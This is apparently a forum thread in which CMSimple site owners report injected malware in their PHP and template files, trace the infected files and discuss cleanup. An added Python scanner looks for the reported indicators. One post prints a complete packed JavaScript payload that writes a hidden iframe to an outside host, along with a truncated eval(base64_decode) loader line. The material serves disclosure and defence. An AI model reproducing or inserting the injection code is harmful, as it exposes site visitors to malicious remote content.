Visitors reported today that a website is hacked. Reviewing index.php and default.php files I've found a code attached to each of these files
[ external image ]
How it got there is not known. Check your websites. At first you'll see only the first two lines of the code as the rest is TABbed far to tight.
So far no part of this string can be found via a batch search in Notepad++. It seems to open file after file
WARNING !!! HACKERS !!!
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Re: WARNING !!! HACKERS !!!
Googling for "malware f524d6" brings some results. It seems this site isn't the only one that has been "hacked" and that it's not specifically targeted at CMSimple. Googling for "http://www.slapcentrum.se/" brings up even more interesting results.
What does the injected code do: it inserts a (nearly) invisible iframe calling a PHP script on another site. What is this script doing? I don't know.
Tata wrote: Check your websites. At first you'll see only the first two lines of the code as the rest is TABbed far to tight.
I wouldn't recommend checking the websites with JS enabled, as this will already trigger the other PHP script. It's better to check the source code of the website with JS disabled.
Christoph M. Becker – Plugins for CMSimple_XH
Re: WARNING !!! HACKERS !!!
You can also, as a first step, scan your site externally with the Free Website Malware Scanner
Regards,
winni
Seen through a viewfinder, everything becomes a subject.
my gallery; my blog, my CMSimple template tutorial
Re: WARNING !!! HACKERS !!!
snafu wrote: You can also, as a first step, scan your site externally with the Free Website Malware Scanner
Maybe a good idea, but it seems that this scanner could not find the js-included iframe...
So it's useless in this special case.
KR
Holger
Re: WARNING !!! HACKERS !!!
It was not that tragic finally. Affected were only:
2lang/index.php
2site/index.php
cmsimple/login.php
cmsimple/languages/default.php - not under all installations
plugins/index.php
I downloaded the entire domain+subdomains and searched for a longer part of the script. Notepad++ managed it. But I needed to open all affected files and remove the script manually. In some of the files the script was inserted in the middle of the file (about #519).
Everything goes up now.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Re: WARNING !!! HACKERS !!!
Tata wrote: It was not that tragic finally.
That's good news!
But you might consider trying to find out how this happened; otherwise it might soon happen again (it could be caused by malware on a client). At least you should remove all writing permissions from the infected files (444 or 400); they don't need them anyway.
Christoph M. Becker – Plugins for CMSimple_XH
Re: WARNING !!! HACKERS !!!
There must be still something in it.
I have found this script also in a language file in advancedform, also in content.htm just after <p>{{{PLUGIN:calendar();}}}</P> and also in template.htm in <head></head>.
Now I have downloaded the backup from this morning, when the page worked well and have uploaded it back.
The page has a picture above the navigation redirecting to a subdomain. And this doesn't work. Evidently the script must still be somewhere. Funny is, that as long as I am logged in, everything works fine. Does it point to a place, where the script is still in function?
EDIT: It was in a content.htm in one of the domains. Soon the upload is ready and CHMOD will take place.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Re: WARNING !!! HACKERS !!!
I don't know if I am the only one on the WWW having hackers' visits to my webspace at least once a year.
Now hundreds of files are "saturated" by
Code:
eval(base64_decode("DQplcnJvcl9.........Cn0KfQ0KfQ0KfQ=="));
The code is added just after the very first <?php in almost all (core and plugins):
language ??.php
??config.php
default.php
config.php
pagedata.php
Also one javascript.js was infected with the code "eval"
Code:
(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 0=a c(),4=a c(0.i()+j);3(h.l.7("m 6")!=-1&&2.b.7("8=s")==-1){3(0.g()!=-1){5 9="d"}2.f("<e"+9+" k"+"r=1 z"+"o=1 A=\'B"+"p://x"+".y/q/\' t=\'u:n"+"w\'></3"+"v>");2.b="8=s;"+" 4="+4.C()+"; "}',39,39,'today||document|if|expires|var||indexOf|_fhjtju|iframe|new|cookie|Date|ame|ifr|write|getTimezoneOffset|navigator|getTime|2678400000|wi|appVersion|MSIE||ht||b2b|dth||style|display|rame|one|secatm|net|heig|src|htt|toGMTString'.split('|')));
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
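The manual search through a downloaded copy of the site, as described in the posts above, can be scripted. The following Python scanner is an added example, not code from any poster or from CMSimple: it looks for the three patterns the thread reports (eval(base64_decode( in PHP, the p,a,c,k,e,d packer in JavaScript, and markup pushed off-screen by a long run of tabs) and notes which flagged files still carry write bits. The indicator names, the 40-character threshold and the sample files are assumptions constructed for this example.

```python
import os, pathlib, re, tempfile

# Indicators described in the posts above. The 40-character whitespace run is
# an assumed threshold; a packer hit can be legitimate minified code, so review it.
INDICATORS = {
    "php-eval-base64": re.compile(rb"eval\s*\(\s*base64_decode\s*\("),
    "js-packer": re.compile(rb"function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*d\s*\)"),
    "offscreen-code": re.compile(rb"[\t ]{40,}(?:<script|<iframe|eval\s*\()", re.I),
}
EXTENSIONS = (".php", ".htm", ".html", ".js")

def scan_file(path):
    """Return the sorted indicator names found in one file."""
    data = pathlib.Path(path).read_bytes()
    hits = [name for name, rx in INDICATORS.items() if rx.search(data)]
    # Flag write bits too: the thread advises 444 or 400 for these files.
    if hits and os.stat(path).st_mode & 0o222:
        hits.append("writable")
    return sorted(hits)

def scan_tree(root):
    """Walk a downloaded copy of the site; map relative path -> findings."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(folder, name)
            hits = scan_file(full) if name.lower().endswith(EXTENSIONS) else []
            if hits:
                report[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return report

def build_sample_site(root):
    """Write constructed sample files (inert placeholders, not the real payload)."""
    samples = {
        "cmsimple/login.php": b'<?php eval(base64_decode("AAAA"));\n$x = 1;\n',
        "plugins/index.php": b"<?php\necho 'clean';\n",
        "templates/javascript.js": b"eval(function(p,a,c,k,e,d){return p}('0',1,1,[''],0,{}));\n",
        "content/content.htm": b"<p>text</p>" + b"\t" * 60 + b"<script>/* hidden */</script>\n",
    }
    for rel, body in samples.items():
        path = pathlib.Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(body)
    os.chmod(os.path.join(root, "cmsimple", "login.php"), 0o444)  # already hardened

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        print(scan_tree(site))
```

Run it against an offline copy of the site rather than the live web root, and treat each hit as a file to open and inspect, since the script reports but does not clean.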